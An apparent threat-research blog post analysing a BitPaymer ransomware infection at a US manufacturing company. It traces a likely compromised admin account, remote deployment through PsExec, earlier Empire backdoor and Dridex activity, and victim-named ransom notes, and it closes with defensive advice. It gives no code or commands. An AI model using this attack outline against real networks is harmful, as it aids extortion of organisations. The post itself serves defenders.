#1254660: Account With Admin Privileges Abused to Install BitPaymer Ransomware via PsExec
Ransomware may have experienced a decline in 2018, but it seems to be getting back on track — only this time, attacks are looking to be more targeted. Coming on the heels of news about a ransomware attack against a U.S. beverage company which addressed the company by name in the ransom note, this blog post looks into a BitPaymer ransomware variant (detected by Trend Micro as Ransom.Win32.BITPAYMER.TGACAJ) that hit a U.S. manufacturing company. As with the beverage company, this company, too, appears to have been targeted as its affected systems showed a ransom note with its name explicitly addressed.
Our investigation leads us to believe that an account with administrator privileges may have been compromised to install BitPaymer via PsExec, a command-line tool that allows the execution of processes on remote computers.
How BitPaymer Gained a Foothold Into the System
BitPaymer, which is related to the iEncrypt ransomware, was executed in the manufacturing company’s system using PsExec. Our analysis revealed that on February 18, 2019 PST, between 9:40 p.m. and 11:03 p.m., commands were sent via PsExec to copy and execute the BitPaymer variant.
The attacker needed at least one account with administrator privileges to run commands via PsExec. This means that a security breach, which may have happened due to unforeseen circumstances, had already transpired before the ransomware was installed.
Data from the Trend Micro™ Smart Protection Network™ infrastructure supports this hypothesis. From January 29 to February 18, multiple attempts to run an Empire PowerShell backdoor on a number of machines were detected. Indicators show that this was done remotely and without dropping a file on the target machines. Binaries associated with Dridex, which we found shared loaders with BitPaymer, were also detected within the same time period. Note that in the case of the U.S. beverage company, some researchers believe that an initial Dridex infection may be linked to the eventual ransomware infection.
Looking at all available information, we can then infer that a security breach had already taken place in the company before or on January 29.
This BitPaymer Variant Is Not New
As mentioned, Ransom.Win32.BITPAYMER.TGACAJ specifically addressed the name of the victim company in the ransom note and also used it as extension name for the encrypted files. These features show that the company was likely targeted. A similar variant of Ransom.Win32.BITPAYMER.TGACAJ was seen late 2018 when it targeted a number of companies, including a Germany-based manufacturing company. That variant also used the name of the victim company in the ransom note and as an extension name for the encrypted files.
Figure 2. In the ransom note, the victim is instructed to contact the threat actor/s to know how much needs to be paid in exchange for decryption. Notably, the key used in the encryption is stored in the message itself, and not within the file. This means losing the ransom note could kill the chance of file decryption.
Apart from the changes made to the ransom note and the file extension reflecting the victim companies’ names, there are no other differences between Ransom.Win32.BITPAYMER.TGACAJ and the variant reported in the latter part of 2018.
Code Comparison to Previous BitPaymer Variants
Our analysis shows that this BitPaymer ransomware variant is not new but is only a modified one in terms of ransom note and the extension name it uses. In our analysis, we saw that the code structure of this variant has many similarities with previously spotted Bitpaymer variants. It uses the same code for its function to get the Windows API and uses the same entry point for the unpacked code. The screenshots below show how each variant parses the API:
The Aftermath of the BitPaymer Execution
The effects of the ransomware infection were minimized on endpoints where a behavioral monitoring solution, along with other anti-ransomware technologies, was enabled. Behavioral monitoring helps in detecting new variants by checking known malicious behaviors. For this particular scenario, it was able to block unwanted file encryption or modification using a detection component feature. Behavioral monitoring also prevented the execution of the Empire backdoor.
However, it’s possible that the security hole that inadvertently allowed the ransomware to execute remains undetected. Undetected objects or components may still be running in the IT environment as well. In cases like this, countermeasures, including updating all accounts and following best practices for preventing the abuse of sysadmin tools such as PsExec, should be taken to avoid future compromise from the same causes.
|Date added||April 15, 2019, 4:55 p.m.|